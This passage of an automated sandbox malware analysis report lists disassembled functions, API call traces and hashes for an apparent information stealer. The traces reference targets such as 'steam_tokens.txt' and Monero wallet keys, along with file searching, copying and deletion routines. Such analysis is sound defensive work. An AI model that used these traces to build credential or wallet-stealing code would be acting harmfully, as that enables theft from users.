Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 87bed4ebfd1b22516bee3eb66c34e253ead5ce997fd7c7cdcc4c80df7bec2bf4
Instruction ID: e2c3fb26258858d87bf0c53b6183e9c0402e9ae5673181e8aa604ae46053629e
Opcode Fuzzy Hash: 87bed4ebfd1b22516bee3eb66c34e253ead5ce997fd7c7cdcc4c80df7bec2bf4
Instruction Fuzzy Hash: DFF04B7280050866CB06FBB0ED529ED773C9A10300F40422AB8526A292EF346A09D7A2

Function 003D7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(003E0E2C), ref: 003D7F00
wsprintfA.USER32 ref: 003D7F16

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 0937451cd2f8e26f8208181ffc050d980be336fa939e4e01983953faad290ac1
Instruction ID: 292a21ef71ae9b9e72f86810fd3b257b7d44cefb1ecdecd6151abc8e2291e760
Opcode Fuzzy Hash: 0937451cd2f8e26f8208181ffc050d980be336fa939e4e01983953faad290ac1
Instruction Fuzzy Hash: 20F0F6B2944208EBC710CF94EC45FEAF7BCFB44714F00066AF50492280D37519008BD1

Function 003CB4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

lstrlen.KERNEL32(00000000), ref: 003CB9C2
lstrlen.KERNEL32(00000000), ref: 003CB9D6

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 14897deddd551f4a35611ea54174773dd483be1a42bb692112c11c48f30e026a
Instruction ID: ffccb256f6f416a37d9332fe6aadd719c14c236d030af05896d95bfa33e42332
Opcode Fuzzy Hash: 14897deddd551f4a35611ea54174773dd483be1a42bb692112c11c48f30e026a
Instruction Fuzzy Hash: 82E133738105589BCB06FBA0EE92EEE7739BF14300F40415AF506AA191EF346B49DB66

Function 003CAEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

lstrlen.KERNEL32(00000000), ref: 003CB16A
lstrlen.KERNEL32(00000000), ref: 003CB17E

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: acafbaac5e23415c984f38ba2645a4bcb8b0a2aed5c7d96f0e1d559deaec1382
Instruction ID: e2cf477e357b834df4b49bed1bc95b9f47ca57f0741e0a492220ad2d10f2dd90
Opcode Fuzzy Hash: acafbaac5e23415c984f38ba2645a4bcb8b0a2aed5c7d96f0e1d559deaec1382
Instruction Fuzzy Hash: F39157739105589BCF06FBA0ED92EEE7779BF14300F40411AF507AA291EF346A09DB66

Function 003CB230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

lstrlen.KERNEL32(00000000), ref: 003CB42E
lstrlen.KERNEL32(00000000), ref: 003CB442

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 4e36d58624209edbbf7a74772b903b731cc2cbd8e6a4abf1a9737a8dd43dd2d5
Instruction ID: 540de12bbdce8ca33067f429103fc71d2943b448051035f2e31417d531d3f735
Opcode Fuzzy Hash: 4e36d58624209edbbf7a74772b903b731cc2cbd8e6a4abf1a9737a8dd43dd2d5
Instruction Fuzzy Hash: CB7155739106589BCF06FBE0EE92DEE7779BF14300F404119F502AA291EF346A09DB62

Function 003D4BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D4BEA
lstrcat.KERNEL32(?,00EBD378), ref: 003D4C08

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D492C
Part of subcall function 003D4910: FindFirstFileA.KERNEL32(?,?), ref: 003D4943

Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FDC), ref: 003D4971
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FE0), ref: 003D4987
Part of subcall function 003D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003D4B7D
Part of subcall function 003D4910: FindClose.KERNEL32(000000FF), ref: 003D4B92

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D49B0
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E08D2), ref: 003D49C5
Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D49E2
Part of subcall function 003D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003D4A1E
Part of subcall function 003D4910: lstrcat.KERNEL32(?,00EBE490), ref: 003D4A4A
Part of subcall function 003D4910: lstrcat.KERNEL32(?,003E0FF8), ref: 003D4A5C
Part of subcall function 003D4910: lstrcat.KERNEL32(?,?), ref: 003D4A70
Part of subcall function 003D4910: lstrcat.KERNEL32(?,003E0FFC), ref: 003D4A82
Part of subcall function 003D4910: lstrcat.KERNEL32(?,?), ref: 003D4A96
Part of subcall function 003D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003D4AAC
Part of subcall function 003D4910: DeleteFileA.KERNEL32(?), ref: 003D4B31

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D4A07

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: e983b1074a316ea68c34d8657dc3a9c0f1a1ded177f056cb162006c7332c0f66
Instruction ID: b295a80248da49c35c35674336ac23b9ff31ffd34f817603744d8ff479f1d509
Opcode Fuzzy Hash: e983b1074a316ea68c34d8657dc3a9c0f1a1ded177f056cb162006c7332c0f66
Instruction Fuzzy Hash: 0D41C9B750020467C759FBA0FC52EEF333DA785740F00864DB6459A286EE759B8C8B92

Function 003C6660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 003C6706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 003C6753

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c5ca2cff8011090f9c7eb4e4aaad130c5467bd6237a0a731d02cf2379c0c473f
Instruction ID: 83f3546573c88b6983b61abbc5a4a2f43cf6b635a7003c3c6928eca7968c5622
Opcode Fuzzy Hash: c5ca2cff8011090f9c7eb4e4aaad130c5467bd6237a0a731d02cf2379c0c473f
Instruction Fuzzy Hash: 6A41C774A00209EFCB45CF98C495BADBBB1FB48314F2486A9E9599B345C731AE91CB84

Function 003D5050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D508A
lstrcat.KERNEL32(?,00EBDE98), ref: 003D50A8

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D492C
Part of subcall function 003D4910: FindFirstFileA.KERNEL32(?,?), ref: 003D4943

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
